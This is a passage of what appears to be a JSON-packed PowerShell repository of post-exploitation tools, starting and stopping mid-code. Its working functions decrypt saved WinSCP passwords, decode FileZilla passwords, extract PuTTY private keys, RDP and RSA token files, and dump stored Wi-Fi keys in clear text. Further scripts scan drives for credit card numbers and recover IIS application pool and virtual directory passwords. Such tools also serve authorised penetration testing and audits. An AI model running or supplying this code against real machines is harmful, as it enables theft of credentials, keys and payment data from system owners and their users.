password, we can crack it:\n      if (!$MasterPassUsed) {\n          $WinSCPSessionObject.Password = (DecryptWinSCPPassword $WinSCPSessionObject.Hostname $WinSCPSessionObject.Username $WinSCPSessionObject.Password)\n      # Else, the user is using a master password. We can't retrieve plaintext credentials for it.\n      } else {\n          $WinSCPSessionObject.Password = \"Saved in session, but master password prevents plaintext recovery\"\n      }\n    }\n\n    # ArrayList.Add() by default prints the index to which it adds the element. Casting to [void] silences this.\n    [void]$ArrayOfWinSCPSessions.Add($WinSCPSessionObject)\n\n  } # For each Session in AllWinSCPSessions\n\n  if ($o) {\n    $ArrayOfWinSCPSessions | Export-CSV -Append -Path ($OutputDirectory + \"\\WinSCP.csv\") -NoTypeInformation\n  } else {\n    Write-Host -NoNewline \"WinSCP Sessions\"\n    $ArrayOfWinSCPSessions | Format-List | Out-String\n  }\n\n  # Add the array of WinSCP session objects to the target user object\n  $UserObject | Add-Member -MemberType NoteProperty -Name \"WinSCP Sessions\" -Value $ArrayOfWinSCPSessions\n\n} # ProcessWinSCPLocal\n\nfunction ProcesssdtidFile($sdtidExtensionFilesINodes) {\n\n  foreach ($Path in $sdtidExtensionFilesINodes.VersionInfo.FileName) {\n\n    $sdtidFileObject = \"\" | Select-Object -Property \"Source\",\"Path\"\n\n    $sdtidFileObject.\"Source\" = $Source\n    $sdtidFileObject.\"Path\" = $Path\n\n    [void]$ArrayOfsdtidFiles.Add($sdtidFileObject)\n\n  }\n\n  if ($ArrayOfsdtidFiles.count -gt 0) {\n\n    $UserObject | Add-Member -MemberType NoteProperty -Name \"sdtid Files\" -Value $ArrayOfsdtidFiles\n\n    if ($o) {\n      $ArrayOfsdtidFiles | Select-Object * | Export-CSV -Append -Path ($OutputDirectory + \"\\RSA sdtid Files.csv\") -NoTypeInformation\n    } else {\n      Write-Host -NoNewline \"RSA Tokens (sdtid)\"\n      $ArrayOfsdtidFiles | Select-Object * | Format-List | Out-String\n    }\n\n  }\n\n} # Process sdtid File\n\nfunction ProcessRDPFile($RDPExtensionFilesINodes) {\n  \n  # Extracting the filepath from the i-node information stored in RDPExtensionFilesINodes\n  foreach ($Path in $RDPExtensionFilesINodes.VersionInfo.FileName) {\n    \n    $RDPFileObject = \"\" | Select-Object -Property \"Source\",\"Path\",\"Hostname\",\"Gateway\",\"Prompts for Credentials\",\"Administrative Session\"\n\n    $RDPFileObject.\"Source\" = (Hostname)\n\n    # The next several lines use regex pattern matching to store relevant info from the .rdp file into our object\n    $RDPFileObject.\"Path\" = $Path \n    $RDPFileObject.\"Hostname\" = try { (Select-String -Path $Path -Pattern \"full address:[a-z]:(.*)\").Matches.Groups[1].Value } catch {}\n    $RDPFileObject.\"Gateway\" = try { (Select-String -Path $Path -Pattern \"gatewayhostname:[a-z]:(.*)\").Matches.Groups[1].Value } catch {}\n    $RDPFileObject.\"Administrative Session\" = try { (Select-String -Path $Path -Pattern \"administrative session:[a-z]:(.*)\").Matches.Groups[1].Value } catch {}\n    $RDPFileObject.\"Prompts for Credentials\" = try { (Select-String -Path $Path -Pattern \"prompt for credentials:[a-z]:(.*)\").Matches.Groups[1].Value } catch {}\n\n    if (!$RDPFileObject.\"Administrative Session\" -or !$RDPFileObject.\"Administrative Session\" -eq 0) {\n      $RDPFileObject.\"Administrative Session\" = \"Does not connect to admin session on remote host\"\n    } else {\n      $RDPFileObject.\"Administrative Session\" = \"Connects to admin session on remote host\"\n    }\n    if (!$RDPFileObject.\"Prompts for Credentials\" -or $RDPFileObject.\"Prompts for Credentials\" -eq 0) {\n      $RDPFileObject.\"Prompts for Credentials\" = \"No\"\n    } else {\n      $RDPFileObject.\"Prompts for Credentials\" = \"Yes\"\n    }\n\n    [void]$ArrayOfRDPFiles.Add($RDPFileObject)\n\n  }\n\n  if ($ArrayOfRDPFiles.count -gt 0) {\n\n    $UserObject | Add-Member -MemberType NoteProperty -Name \"RDP Files\" -Value $ArrayOfRDPFiles\n\n    if ($o) {\n      $ArrayOfRDPFiles | Select-Object * | Export-CSV -Append -Path ($OutputDirectory + \"\\Microsoft rdp Files.csv\") -NoTypeInformation\n    } else {\n      Write-Host -NoNewline \"Microsoft RDP Connection Files (.rdp)\"\n      $ArrayOfRDPFiles | Select-Object * | Format-List | Out-String\n    }\n\n  }\n\n} # Process RDP File\n\nfunction ProcessPPKFile($PPKExtensionFilesINodes) {\n\n  # Extracting the filepath from the i-node information stored in PPKExtensionFilesINodes\n  foreach ($Path in $PPKExtensionFilesINodes.VersionInfo.FileName) {\n\n    # Private Key Encryption property identifies whether the private key in this file is encrypted or if it can be used as is\n    $PPKFileObject = \"\" | Select-Object -Property \"Source\",\"Path\",\"Protocol\",\"Comment\",\"Private Key Encryption\",\"Private Key\",\"Private MAC\"\n\n    $PPKFileObject.\"Source\" = (Hostname)\n\n    # The next several lines use regex pattern matching to store relevant info from the .ppk file into our object\n    $PPKFileObject.\"Path\" = $Path\n\n    $PPKFileObject.\"Protocol\" = try { (Select-String -Path $Path -Pattern \": (.*)\" -Context 0,0).Matches.Groups[1].Value } catch {}\n    $PPKFileObject.\"Private Key Encryption\" = try { (Select-String -Path $Path -Pattern \"Encryption: (.*)\").Matches.Groups[1].Value } catch {}\n    $PPKFileObject.\"Comment\" = try { (Select-String -Path $Path -Pattern \"Comment: (.*)\").Matches.Groups[1].Value } catch {}\n    $NumberOfPrivateKeyLines = try { (Select-String -Path $Path -Pattern \"Private-Lines: (.*)\").Matches.Groups[1].Value } catch {}\n    $PPKFileObject.\"Private Key\" = try { (Select-String -Path $Path -Pattern \"Private-Lines: (.*)\" -Context 0,$NumberOfPrivateKeyLines).Context.PostContext -Join \"\" } catch {}\n    $PPKFileObject.\"Private MAC\" = try { (Select-String -Path $Path -Pattern \"Private-MAC: (.*)\").Matches.Groups[1].Value } catch {}\n\n    # Add the object we just created to the array of .ppk file objects\n    [void]$ArrayOfPPKFiles.Add($PPKFileObject)\n\n  }\n\n  if ($ArrayOfPPKFiles.count -gt 0) {\n\n    $UserObject | Add-Member -MemberType NoteProperty -Name \"PPK Files\" -Value $ArrayOfPPKFiles\n\n    if ($o) {\n      $ArrayOfPPKFiles | Select-Object * | Export-CSV -Append -Path ($OutputDirectory + \"\\PuTTY ppk Files.csv\") -NoTypeInformation\n    } else {\n      Write-Host -NoNewline \"PuTTY Private Key Files (.ppk)\"\n      $ArrayOfPPKFiles | Select-Object * | Format-List | Out-String\n    }\n\n  }\n\n} # Process PPK File\n\nfunction ProcessFileZillaFile($FileZillaXML) {\n\n  # Locate all <Server> nodes (aka session nodes), iterate over them\n  foreach($FileZillaSession in $FileZillaXML.SelectNodes('//FileZilla3/Servers/Server')) {\n      # Hashtable to store each session's data\n      $FileZillaSessionHash = @{}\n\n      # Iterates over each child node under <Server> (aka session)\n      $FileZillaSession.ChildNodes | ForEach-Object {\n\n          $FileZillaSessionHash[\"Source\"] = $Source\n          # If value exists, make a key-value pair for it in the hash table\n          if ($_.InnerText) {\n              if ($_.Name -eq \"Pass\") {\n                  $FileZillaSessionHash[\"Password\"] = $_.InnerText\n              } else {\n                  # Populate session data based on the node name\n                  $FileZillaSessionHash[$_.Name] = $_.InnerText\n              }\n              \n          }\n\n      }\n\n    # Create object from collected data, excluding some trivial information\n    [void]$ArrayOfFileZillaSessions.Add((New-Object PSObject -Property $FileZillaSessionHash | Select-Object -Property * -ExcludeProperty \"#text\",LogonType,Type,BypassProxy,SyncBrowsing,PasvMode,DirectoryComparison,MaximumMultipleConnections,EncodingType,TimezoneOffset,Colour))\n     \n  } # ForEach FileZillaSession in FileZillaXML.SelectNodes()\n  \n  # base64_decode the stored encoded session passwords, and decode protocol\n  foreach ($Session in $ArrayOfFileZillaSessions) {\n      $Session.Password = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($Session.Password))\n      if ($Session.Protocol -eq \"0\") {\n        $Session.Protocol = \"Use FTP over TLS if available\"\n      } elseif ($Session.Protocol -eq 1) {\n        $Session.Protocol = \"Use SFTP\"\n      } elseif ($Session.Protocol -eq 3) {\n        $Session.Protocol = \"Require implicit FTP over TLS\"\n      } elseif ($Session.Protocol -eq 4) {\n        $Session.Protocol = \"Require explicit FTP over TLS\"\n      } elseif ($Session.Protocol -eq 6) {\n        $Session.Protocol = \"Only use plain FTP (insecure)\"\n      } \n  }\n\n  if ($o) {\n    $ArrayOfFileZillaSessions | Export-CSV -Append -Path ($OutputDirectory + \"\\FileZilla.csv\") -NoTypeInformation\n  } else {\n    Write-Host -NoNewline \"FileZilla Sessions\"\n    $ArrayOfFileZillaSessions | Format-List | Out-String\n  }\n\n  # Add the array of FileZilla session objects to the target user object\n  $UserObject | Add-Member -MemberType NoteProperty -Name \"FileZilla Sessions\" -Value $ArrayOfFileZillaSessions\n\n} # ProcessFileZillaFile\n\nfunction ProcessSuperPuTTYFile($SuperPuTTYXML) {\n\n  foreach($SuperPuTTYSessions in $SuperPuTTYXML.ArrayOfSessionData.SessionData) {\n\n    foreach ($SuperPuTTYSession in $SuperPuTTYSessions) { \n      if ($SuperPuTTYSession -ne $null) {\n\n        $SuperPuTTYSessionObject = \"\" | Select-Object -Property \"Source\",\"SessionId\",\"SessionName\",\"Host\",\"Username\",\"ExtraArgs\",\"Port\",\"Putty Session\"\n\n        $SuperPuTTYSessionObject.\"Source\" = $Source\n        $SuperPuTTYSessionObject.\"SessionId\" = $SuperPuTTYSession.SessionId\n        $SuperPuTTYSessionObject.\"SessionName\" = $SuperPuTTYSession.SessionName\n        $SuperPuTTYSessionObject.\"Host\" = $SuperPuTTYSession.Host\n        $SuperPuTTYSessionObject.\"Username\" = $SuperPuTTYSession.Username\n        $SuperPuTTYSessionObject.\"ExtraArgs\" = $SuperPuTTYSession.ExtraArgs\n        $SuperPuTTYSessionObject.\"Port\" = $SuperPuTTYSession.Port\n        $SuperPuTTYSessionObject.\"PuTTY Session\" = $SuperPuTTYSession.PuttySession\n\n        [void]$ArrayOfSuperPuTTYSessions.Add($SuperPuTTYSessionObject)\n      } \n    }\n\n  } # ForEach SuperPuTTYSessions\n\n  if ($o) {\n    $ArrayOfSuperPuTTYSessions | Export-CSV -Append -Path ($OutputDirectory + \"\\SuperPuTTY.csv\") -NoTypeInformation\n  } else {\n    Write-Host -NoNewline \"SuperPuTTY Sessions\"\n    $ArrayOfSuperPuTTYSessions | Out-String\n  }\n\n  # Add the array of SuperPuTTY session objects to the target user object\n  $UserObject | Add-Member -MemberType NoteProperty -Name \"SuperPuTTY Sessions\" -Value $ArrayOfSuperPuTTYSessions\n\n} # ProcessSuperPuTTYFile\n\n####################################################################################\n####################################################################################\n## WinSCP Deobfuscation Helper Functions\n####################################################################################\n####################################################################################\n\n# Gets all domain-joined computer names and properties in one object\nfunction GetComputersFromActiveDirectory {\n\n  $strCategory = \"computer\"\n  $objDomain = New-Object System.DirectoryServices.DirectoryEntry\n  $objSearcher = New-Object System.DirectoryServices.DirectorySearcher\n  $objSearcher.SearchRoot = $objDomain\n  $objSearcher.Filter = (\"(objectCategory=$strCategory)\")\n\n  $colProplist = \"name\"\n\n  foreach ($i in $colPropList){$objSearcher.PropertiesToLoad.Add($i)}\n\n  return $objSearcher.FindAll()\n\n}\n\nfunction DecryptNextCharacterWinSCP($remainingPass) {\n\n  # Creates an object with flag and remainingPass properties\n  $flagAndPass = \"\" | Select-Object -Property flag,remainingPass\n\n  # Shift left 4 bits equivalent for backwards compatibility with older PowerShell versions\n  $firstval = (\"0123456789ABCDEF\".indexOf($remainingPass[0]) * 16)\n  $secondval = \"0123456789ABCDEF\".indexOf($remainingPass[1])\n\n  $Added = $firstval + $secondval\n\n  $decryptedResult = (((-bnot ($Added -bxor $Magic)) % 256) + 256) % 256\n\n  $flagAndPass.flag = $decryptedResult\n  $flagAndPass.remainingPass = $remainingPass.Substring(2)\n\n  return $flagAndPass\n\n}\n\nfunction DecryptWinSCPPassword($SessionHostname, $SessionUsername, $Password) {\n\n  $CheckFlag = 255\n  $Magic = 163\n\n  $len = 0\n  $key =  $SessionHostname + $SessionUsername\n  $values = DecryptNextCharacterWinSCP($Password)\n\n  $storedFlag = $values.flag \n\n  if ($values.flag -eq $CheckFlag) {\n    $values.remainingPass = $values.remainingPass.Substring(2)\n    $values = DecryptNextCharacterWinSCP($values.remainingPass)\n  }\n\n  $len = $values.flag\n\n  $values = DecryptNextCharacterWinSCP($values.remainingPass)\n  $values.remainingPass = $values.remainingPass.Substring(($values.flag * 2))\n\n  $finalOutput = \"\"\n  for ($i=0; $i -lt $len; $i++) {\n    $values = (DecryptNextCharacterWinSCP($values.remainingPass))\n    $finalOutput += [char]$values.flag\n  }\n\n  if ($storedFlag -eq $CheckFlag) {\n    return $finalOutput.Substring($key.length)\n  }\n\n  return $finalOutput\n\n}\n"
  },
  {
    "path": "modules/WiFi-Password.psm1",
    "content": "function Extract-Value(\n    [string[]]$Lines,\n    [string]$Name\n) {\n    $Lines | Select-String \" $Name\\s+: (.*)\" |% { $_.Matches.Groups[1].Value }\n}\n\n<#\n.Synopsis\n    Get list of Wi-Fi networks.\n.Description\n    Returns SSIDs of all the stored Wi-Fi networks.\n.Example\n    List-WiFi\n#>\nfunction Select-WiFi {\n    netsh wlan show profiles | Select-String \": (.*)\" |% { $_.Matches.Groups[1].Value }\n}\n\n<#\n.Synopsis\n    View password of current or given Wi-Fi network.\n.Description\n    Allows to view stored password of currently or earlier connected Wi-Fi network.\n.Parameter SSID\n    Name of stored Wi-Fi network.\n.Example\n    # View password of currently connected Wi-Fi network.\n    Show-WiFiPassword\n.Example\n    # View stored password of earlier connected Wi-Fi network.\n    Show-WiFiPassword Home\n#>\nfunction Show-WiFiPassword(\n    [string]$SSID = (Extract-Value (netsh wlan show interface) \"SSID\")\n) {\n    $Network = netsh wlan show profiles name=$SSID key=clear\n    If (!$?) {\n        Write-Host $Network\n        Return\n    }\n    $AuthType = Extract-Value $Network \"Authentication\"\n    $Password = Extract-Value $Network \"Key Content\"\n    Write-Host \"\nSSID       : $SSID\nPassword   : $Password\nAuth type  : $AuthType\n\"\n}\n\nSet-Alias WiFi-Password Show-WiFiPassword\n\nExport-ModuleMember -Function *WiFi* -Alias *WiFi*\n"
  },
  {
    "path": "modules/credit-card-finder.ps1",
    "content": "###################################################################\n###################################################################\n##\n##  ----====----==== CREDIT CARD FINDER ====----====----\n##\n##  Usage: .\\find-credit-cards.ps1 -path C:\\\n##   - To output to a file, use .\\find-credit-cards.ps1 -path C:\\ > result.txt\n##\n##  Features:\n##   - Searches recursively through the provided path\n##     searching for valid credit card numbers\n##   - Large files are read in chunks so as to not\n##     exhaust system resources\n##\n##  License:\n##\n##    Copyright (C) 2011 Jaap Karan Singh\n##    (github.com/jksdua)\n##\n##    This work is licensed under the Creative Commons\n##    Attribution 3.0 United States License. To view a\n##    copy of this license, visit http://creativecommons\n##    .org/licenses/by/3.0/us/ or send a letter to\n##    Creative Commons, 171 Second Street, Suite 300,\n##    San Francisco, California, 94105, USA.\n##\n##    This program is distributed in the hope that it\n##    will be useful, but WITHOUT ANY WARRANTY; without\n##    even the implied warranty of MERCHANTABILITY or\n##    FITNESS FOR A PARTICULAR PURPOSE.\n##\n##    Contact: Twitter - @jksdua, Email - jksdua@gmail.com\n##\n###################################################################\n###################################################################\n\n###################################################################\n## To do:\n## - Allow logging to file\n## - Add support for word and powerpoint\n## - Modularise the file\n##     Separate scanner and output\n##     Compress size using techniques in\n##        http://technet.microsoft.com/en-us/magazine/2008.04.securitywatch.aspx\n##        http://blesseddlo.wordpress.com/2011/01/31/powershell-re-to-match-credit-card-patterns/\n## - Add debug ability for printing errors\n## - Add matcher for key strings such as \"credit card, pci, invoice etc\"\n## - Add support for logging output to file\n## - Use Github issue tracker for recording to do items\n## - Output file type next to the filename when outputting\n## - Provide stats on what filetype had the most findings etc\n## - Add support for multiple streams such as db etc\n## - Add support for hasehd credit cards\n##     https://www.netspi.com/blog/entryid/182/cracking-credit-card-hashes-with-powershell\n##     http://www.sectechno.com/2013/09/15/checking-credit-card-numbers-with-powershell/\n## - Add support for detecting credit card type\n## - Add incremental scan support\n## - Watch for interrupt and cleanup excel and other variables\n###################################################################\n\nparam (\n  [string]$path = $(throw \"-path is required\")\n)\n\n\n## normalise path so both absolute and relative paths work\n$path = Resolve-Path($path)\n\n$REGEX = [regex]\"(?im)(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\\d{3})\\d{11})\"\n$MAX_SIZE = 50mb\n$MAX_SIZE_STR = \"50mb\"\n$BATCH = 1000\n\n[long]$global:found = 0\n$global:baseDir = split-path -parent $MyInvocation.MyCommand.Definition;\n\n## Add support for pdf documents\ntry {\n  $PdfDll = Join-Path -path $baseDir -childPath \"\\lib\\itextsharp-dll-core\\itextsharp.dll\"\n  Add-Type -Path $PdfDll\n} catch [Exception] {\n  #Write-Host -ForegroundColor RED (\"Failed to load PDF dll. PDF files will be reported, review these manually.\")\n  #Write-Host \"\"\n}\n\n## Add support for excel documents\ntry {\n  $global:Excel = New-Object -comobject Excel.Application\n  $global:Excel.visible = $False\n} catch [Exception] {\n  #Write-Host -ForegroundColor RED (\"Failed to load Excel dll. Excel files will be reported, review these manually.\")\n  #Write-Host \"\"\n}\n\n####################################################################\n## Returns true if the given array of digits represents \n## a valid Luhn number, and false otherwise.\n## source: http://codegolf.stackexchange.com/questions/22/the-luhn-algorithm-for-verifying-credit-card-numbers-etc\nfilter Luhn($x){$l=$x.Length-1;$l..0|%{$d=$x[$_]-48;if($_%2-eq$l%2){$s+=$d}elseif($d-le4){$s+=$d*2}else{$s+=$d*2-9}};!($s%10)}\n\nfunction FindCreditCards($path) {\n  [long[]]$creditCards = @()\n\n  Foreach ($data in $input) {\n    Select-String -pattern $REGEX -input $data -AllMatches |\n      Foreach {\n        Foreach ($match in $_.matches) {\n          $creditCards += $match.value\n        }\n      }\n  }\n  # ideally this function should only return an array of findings and then the parent function should decide what to do\n  ProcessFileResults -path $path -results $creditCards\n\n  ## cleanup\n  $creditCards = $data = $path = $match = $null\n}\n\n## Ensures credit cards are valid, increments global counter and prints results to console\nfunction ProcessFileResults($path, $results) {\n  [long[]]$validatedCreditCards = @()\n  Foreach($val in $results) {\n    if (Luhn([string]$val)) {\n      $global:found++;\n      $validatedCreditCards += $val\n    }\n  }\n  PrintFileResults -path $path -results $validatedCreditCards\n\n  ## cleanup\n  $validatedCreditCards = $val = $results = $path = $null\n}\n\nfunction PrintFileResults($path, $results) {\n  if ($results.length) {\n    Write-Host -ForegroundColor GREEN (\"File: \" + $path)\n    $len = $path.length + 6\n    $line = ''\n    Do {\n      $line += '-'\n    } Until (--$len -le 0)\n    Write-Host -ForegroundColor GREEN $line\n    Foreach ($item in $results) {\n      Write-Host $item\n    }\n    #Write-Host \"Found:\" $results.length\n    #Write-Host \"\"\n\n    ## cleanup\n    $path = $results = $null\n  }\n}\n\nfunction Get-PdfContent($path) {\n  $reader = New-Object iTextSharp.text.pdf.pdfreader -ArgumentList $path\n  for ($page = 1; $page -le $reader.NumberOfPages; $page++) {\n      $strategy = new-object  'iTextSharp.text.pdf.parser.SimpleTextExtractionStrategy'\n      $currentText = [iTextSharp.text.pdf.parser.PdfTextExtractor]::GetTextFromPage($reader, $page, $strategy);\n      [string[]]$Text += [system.text.Encoding]::UTF8.GetString([System.Text.ASCIIEncoding]::Convert( [system.text.encoding]::default  , [system.text.encoding]::UTF8, [system.text.Encoding]::Default.GetBytes($currentText)));\n  }\n  $reader.Close();\n  return $Text\n}\n\nfunction Get-ExcelContent($path) {\n  [long[]]$creditCards = @()\n  $excelSheet = Get-Item -Path $path -ea stop\n  $workbook = $global:Excel.Workbooks.Open($excelSheet)\n\n  For($i = 1 ; $i -le $workbook.Sheets.count ; $i++) {\n    $worksheet = $workbook.sheets.item($i)\n    #\"`tLooking for matches on $($worksheet.name) worksheet\"\n    $rowMax = ($worksheet.usedRange.rows).count\n    $columnMax = ($worksheet.usedRange.columns).count\n    For($row = 1 ; $row -le $rowMax ; $row ++) {\n      For($column = 1 ; $column -le $columnMax ; $column ++) {\n        [string]$formula = $workSheet.cells.item($row,$column).formula\n        if($formula -match [regex]$REGEX) {\n          $creditCards += \"`t`t$($formula)\"\n        }\n      } #end for $column\n    } #end for $row\n    $worksheet = $rowmax = $columnMax = $row = $column = $formula = $null\n  } #end for\n\n  $workbook.saved = $True\n  $workbook.close()\n\n  ProcessFileResults -path $path -results $creditCards\n\n  $creditCards = $path = $null\n}\n\n# Checks if the user pressed Ctrl+C\nfunction gotInterrupt() {\n  if ([console]::KeyAvailable) {\n    $key = [system.console]::readkey($true)\n    return (($key.modifiers -band [consolemodifiers]\"control\") -and ($key.key -eq \"C\"))\n  }\n}\n\n###################################################################\n## Loops through the provided path running a scan on files and\n## returns subfolders found\nfunction Scan([string]$path) {\n  ## reduce memory load if possible\n  [gc]::collect()\n\n  [string[]]$todo = @()\n\n  $fc = new-object -com scripting.filesystemobject\n  $folder = $fc.getfolder($path)\n\n  foreach ($i in $folder.files) {\n    ## get out if user wants to exit\n    if (gotInterrupt) { throw \"INTERRUPT\" }\n\n    $path = [string]$i.path\n\n    try {\n      if ($i.Size -gt $MAX_SIZE) {\n        #Write-Host -ForegroundColor YELLOW \"Review $path manually. File size of $([Math]::Truncate($i.Size/1mb))mb is greater than the max allowed size of $MAX_SIZE_STR.\"\n        #Write-Host \"\"\n      } else {\n        ## dev\n        #Write-Host \"Processing file: \" + $path\n\n        if ($path -cmatch \".*\\.(doc|ppt).{0,1}$\") {\n          ## dev\n          #Write-Host \"File type: office\"\n\n          #Write-Host -ForegroundColor YELLOW \"Review $path manually. Office files are currently not supported.\"\n          #Write-Host \"\"\n        } elseif ($path -cmatch \".*\\.(zip|tar|gz).{0,1}$\") {\n          ## dev\n          #Write-Host \"File type: zipped\"\n\n          #Write-Host -ForegroundColor YELLOW \"Review $path manually. Zipped files are currently not supported.\"\n          #Write-Host \"\"\n        } elseif ($path -cmatch \".*\\.(xls|xlsx).{0,1}$\") {\n          ## dev\n          #Write-Host \"File type: excel\"\n\n          Get-ExcelContent -path $path\n        } elseif ($path -cmatch \"\\.pdf$\") {\n          ## dev\n          #Write-Host \"File type: pdf\"\n\n          # pdf by default reads line by line\n            # still need to run benchmarks to ensure memory is flushed after a line has been read\n          Get-PdfContent $path | FindCreditCards -path $path\n        } elseif ($path -cmatch \".*\\.(txt|log|bak).{0,1}$\") {\n          Get-Content $path -ReadCount $BATCH -ea stop |\n            FindCreditCards -path $path\n        } else {\n          ## dev\n          #Write-Host \"File type: anything really\"\n\n          # using get content and batch reads the file in chunks\n          # -ea stop added because open files still print an error to the console\n          # see: http://stackoverflow.com/questions/3097785/powershell-ioexception-try-catch-isnt-working\n          #Get-Content $path -ReadCount $BATCH -ea stop |\n          #  FindCreditCards -path $path\n        }\n      }\n    } catch [Exception] {\n      ## required since streamreader may throw this\n      if (!$($_.Exception.Message).CompareTo(\"INTERRUPT\")) {\n        throw $_.Exception\n      }\n      #Write-Host -ForegroundColor RED (\"Failed to process file: \" + $i.Path)\n      #Write-Host \"\"\n    }\n  }\n\n  try {\n    foreach ($i in $folder.subfolders) {\n      ## Dev\n      #Write-Host \"Found additional folder: \" + $i.path\n\n      $todo += $i.path\n    }\n  } catch [Exception] {\n    Write-Host -ForegroundColor RED (\"Failed to queue folder for scanning: \" + $i.path)\n    Write-Host \"\"\n  }\n\n  return $todo\n}\n\nfunction ScanManager() {\n  [string[]]$todo = @()\n  [string]$next = $path\n\n  while ($next) {\n    try {\n      # add any additional folders identified to todo list\n      $todo += Scan($next)\n    } catch [Exception] {\n      if (!$($_.Exception.Message).CompareTo(\"INTERRUPT\")) {\n        Write-Host \"[Ctrl+C] Caught user interrupt\"\n        throw $_.Exception\n      }\n      #Write-Host -ForegroundColor RED (\"Failed to scan folder: \" + $next + \". Reason: \" + $($_.Exception.Message))\n      #Write-Host \"\"\n    }\n\n    # shift array to get next element\n    # http://blogs.msdn.com/b/powershell/archive/2007/02/06/powershell-tip-how-to-shift-arrays.aspx\n    $next, $todo = $todo\n  }\n}\n\n## Catch Ctrl+C to garbage collect on exit\n## http://sushihangover.blogspot.com.au/2012/03/powershell-using-try-finally-block-to.html\ntry {\n  [console]::TreatControlCAsInput = $true\n  ScanManager\n  \"\"\n  #\"Total found: \" + $found\n  \"\"\n# ignore exception\n} catch [Exception] {\n} finally {\n  # No matter what the user did, reset the console to process Ctrl-C inputs 'normally'\n  [console]::TreatControlCAsInput = $false\n\n  #Write-Host \"Cleaning up...\"\n  #Write-Host \"\"\n\n  # wrapped since excel is only optionally loaded if it exists on the system\n  try {\n    ## cleanup excel objects\n    $global:Excel.quit()\n    $global:Excel = $null\n  } catch [Exception] {}\n\n  ## cleanup memory\n  [gc]::collect()\n  [gc]::WaitForPendingFinalizers()\n  # force clean since in some instances it does not shut properly\n  #try {\n  #  ps excel | kill\n  #} catch [Exception] {}\n}\n\n\n\n# Sample credit card data for testing\n#378282246310005\n#371449635398431\n#371449635398432"
  },
  {
    "path": "modules/get-applicationhost.ps1",
    "content": "function Get-ApplicationHost\n{\t\n    # Author: Scott Sutherland - 2014, NetSPI\n    # Version: Get-ApplicationHost v1.0\n\t\n    <#\n\t    .SYNOPSIS\n\t       This script will recover encrypted application pool and virtual directory passwords from the applicationHost.config on the system.\n\t   \n\t    .DESCRIPTION\n\t       This script will decrypt and recover application pool and virtual directory passwords\n\t       from the applicationHost.config file on the system.  The output supports the \n\t       pipeline which can be used to convert all of the results into a pretty table by piping \n\t       to format-table.\n\t   \n\t    .EXAMPLE\n\t       Return application pool and virtual directory passwords from the applicationHost.config on the system.\n\t   \n\t       PS C:\\>get-applicationhost.ps1\t\t   \n\n            user    : PoolUser1\n            pass    : PoolParty1!\n            type    : Application Pool\n            vdir    : NA\n            apppool : ApplicationPool1\n\n            user    : PoolUser2\n            pass    : PoolParty2!\n            type    : Application Pool\n            vdir    : NA\n            apppool : ApplicationPool2\n\n            user    : VdirUser1\n            pass    : VdirPassword1!\n            type    : Virtual Directory\n            vdir    : site1/vdir1/\n            apppool : NA\n\n            user    : VdirUser2\n            pass    : VdirPassword2!\n            type    : Virtual Directory\n            vdir    : site2/\n            apppool : NA\n\t   \n\t    .EXAMPLE\n\t       Return a list of cleartext and decrypted connect strings from web.config files.\n\t   \n\t       PS C:\\>get-applicationhost.ps1 | Format-Table -Autosize\n\t       \n            user          pass               type              vdir         apppool\n            ----          ----               ----              ----         -------\n            PoolUser1     PoolParty1!       Application Pool   NA           ApplicationPool1\n            PoolUser2     PoolParty2!       Application Pool   NA           ApplicationPool2 \n            VdirUser1     VdirPassword1!    Virtual Directory  site1/vdir1/ NA     \n            VdirUser2     VdirPassword2!    Virtual Directory  site2/       NA     \n\n\t     .LINK\n\t       http://www.netspi.com\n\t       https://raw2.github.com/NetSPI/cmdsql/master/cmdsql.aspx\n\t       http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe\n\t       http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx\t\n\n\t    #>\n\n\n    # Check if appcmd.exe exists\n    if (Test-Path  (\"c:\\windows\\system32\\inetsrv\\appcmd.exe\"))\n    {\n        # Create data table to house results\n        $DataTable = New-Object System.Data.DataTable \n\n        # Create and name columns in the data table\n        $DataTable.Columns.Add(\"user\") | Out-Null\n        $DataTable.Columns.Add(\"pass\") | Out-Null  \n        $DataTable.Columns.Add(\"type\") | Out-Null\n        $DataTable.Columns.Add(\"vdir\") | Out-Null\n        $DataTable.Columns.Add(\"apppool\") | Out-Null\n\n        # Get list of application pools\n        c:\\windows\\system32\\inetsrv\\appcmd.exe list apppools /text:name | \n        foreach { \n\t\t\t\n\t\t\t#Get application pool name\n\t\t\t$PoolName = $_\n\t\t\t\n            #Get username \t\t\t\n\t\t\t$PoolUserCmd = 'c:\\windows\\system32\\inetsrv\\appcmd.exe list apppool \"'+$PoolName+'\" /text:processmodel.username'\n            $PoolUser = invoke-expression $PoolUserCmd \n\t\t\t\t\t\t\n\t\t\t#Get password\n\t\t\t$PoolPasswordCmd = 'c:\\windows\\system32\\inetsrv\\appcmd.exe list apppool \"'+$PoolName+'\" /text:processmodel.password'\n            $PoolPassword = invoke-expression $PoolPasswordCmd \n\n\t\t\t#Check if credentials exists\n            IF ($PoolPassword -ne \"\")\n            {\n            \t\t\t\n\t\t\t    #Add credentials to database\n\t\t\t    $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName) | Out-Null  \n            }\n        }\n\t\t\n\n        # Get list of virtual directories\n        c:\\windows\\system32\\inetsrv\\appcmd.exe list vdir /text:vdir.name | \n        foreach { \n\n            #Get Virtual Directory Name\n            $VdirName = $_\n\t\t\t\n            #Get username \t\t\t\n\t\t\t$VdirUserCmd = 'c:\\windows\\system32\\inetsrv\\appcmd list vdir \"'+$VdirName+'\" /text:userName'\n            $VdirUser = invoke-expression $VdirUserCmd\n\t\t\t\t\t\t\n\t\t\t#Get password\t\t\n\t\t\t$VdirPasswordCmd = 'c:\\windows\\system32\\inetsrv\\appcmd list vdir \"'+$VdirName+'\" /text:password'\n            $VdirPassword = invoke-expression $VdirPasswordCmd\n\n\t\t\t#Check if credentials exists\n            IF ($VdirPassword -ne \"\")\n            {\n            \t\t\t\n\t\t\t    #Add credentials to database\n\t\t\t    $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA') | Out-Null  \n            }\n        }\n\t\n\n        # Check if any passwords were found\n        if( $DataTable.rows.Count -gt 0 )\n        {\n\n            # Display results in list view that can feed into the pipeline    \n            $DataTable | 